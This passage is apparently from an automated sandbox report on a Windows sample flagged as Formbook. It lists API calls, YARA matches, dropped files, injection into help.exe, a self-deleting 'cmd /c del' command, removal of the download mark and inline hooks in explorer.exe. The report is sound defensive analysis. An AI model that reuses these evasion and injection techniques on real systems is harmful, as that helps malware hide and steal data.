Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0A770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A096D0 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EEB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9560 NtWriteFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EEAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EEA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EEA770 NtOpenThread,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EEA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EA050 NtClose,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EA100 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E9F20 NtCreateFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E9FD0 NtReadFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EA04A NtClose,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EA0FA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E9F72 NtCreateFile,
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E9FCA NtReadFile,

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Code function: 0_2_09524F14 CreateProcessAsUserW,

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0178C850
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0178D349
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0178EA78
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_01789D60
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_01786DA8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0178BFB0
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_01786630
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03140670
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03142680
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03148430
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03147AD0
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03141E81
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0314CCD8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0314D7E8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03142670
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03140660
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_03147AC2
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_0314CCC8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09521D50
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_095261A8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09520040
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09523810
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09523F40
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09528A48
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09520A28
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09525910
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09525920
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09526199
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09523801
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09526C30
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_095278F0
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09525499
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_095254A8
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09523F30
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09529668
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_09528A38
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041E8AB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041E141
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041EA85
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00409E2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00409E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00FA2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CF900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A920A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DB090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A928EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FEBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8DBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A92B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A922AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A925DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DD5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A92D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C0D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A91D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8D466
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A91FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A92EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E6E30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8D616
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F728EC
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F720A8
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBB090
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6D466
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61002
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBD5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F725DD
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F71D55
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA0D20
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAF900
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F72D07
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F72EF7
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F722AE
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC6E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F71FF1
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6DBD2
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDEBB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F72B28
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EE8AC
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EE141
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005EEA85
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005D2D90
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005D2D87
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005D9E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005D9E2C
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005D2FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 019CB150 appears 35 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00EAB150 appears 35 times

Source: 4NoiNHCNoU.exe	Binary or memory string: OriginalFilename vs 4NoiNHCNoU.exe
Source: 4NoiNHCNoU.exe, 00000000.00000002.680327684.0000000006330000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs 4NoiNHCNoU.exe
Source: 4NoiNHCNoU.exe, 00000000.00000002.679218107.0000000005840000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4NoiNHCNoU.exe
Source: 4NoiNHCNoU.exe, 00000000.00000002.673584401.00000000032AA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs 4NoiNHCNoU.exe
Source: 4NoiNHCNoU.exe, 00000000.00000002.680022162.00000000062C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs 4NoiNHCNoU.exe
Source: 4NoiNHCNoU.exe	Binary or memory string: OriginalFilenameIMG_43016.exeL vs 4NoiNHCNoU.exe

Source: 4NoiNHCNoU.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/2@5/5

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4NoiNHCNoU.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: 4NoiNHCNoU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4NoiNHCNoU.exe	Virustotal: Detection: 30%
Source: 4NoiNHCNoU.exe	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\4NoiNHCNoU.exe 'C:\Users\user\Desktop\4NoiNHCNoU.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: 4NoiNHCNoU.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4NoiNHCNoU.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, help.exe, 00000006.00000002.1005392227.000000000359F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.687730403.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000002.00000002.709206152.0000000001ABF000.00000040.00000001.sdmp, help.exe, 00000006.00000002.1004484328.0000000000E80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, help.exe
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000002.00000000.666209979.0000000000FA2000.00000002.00020000.sdmp, help.exe, 00000006.00000002.1005392227.000000000359F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: help.pdbGCTL source: AddInProcess32.exe, 00000002.00000002.709813502.0000000001DC0000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: AddInProcess32.exe, 00000002.00000002.709813502.0000000001DC0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.687730403.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_095289FA push eax; retf
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 0_2_095289F8 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041D075 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041D0C2 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041D0CB push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00417161 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041D12C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00417B72 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A1D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EFD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005ED075 push eax; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005ED0CB push eax; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005ED0C2 push eax; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E7161 push es; iretd
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005ED12C push eax; ret
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_005E7B72 push es; iretd

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe

File opened: C:\Users\user\Desktop\4NoiNHCNoU.exe\:Zone.Identifier read attributes | delete

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEA

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Process information set: NOOPENFILEERRORBOX
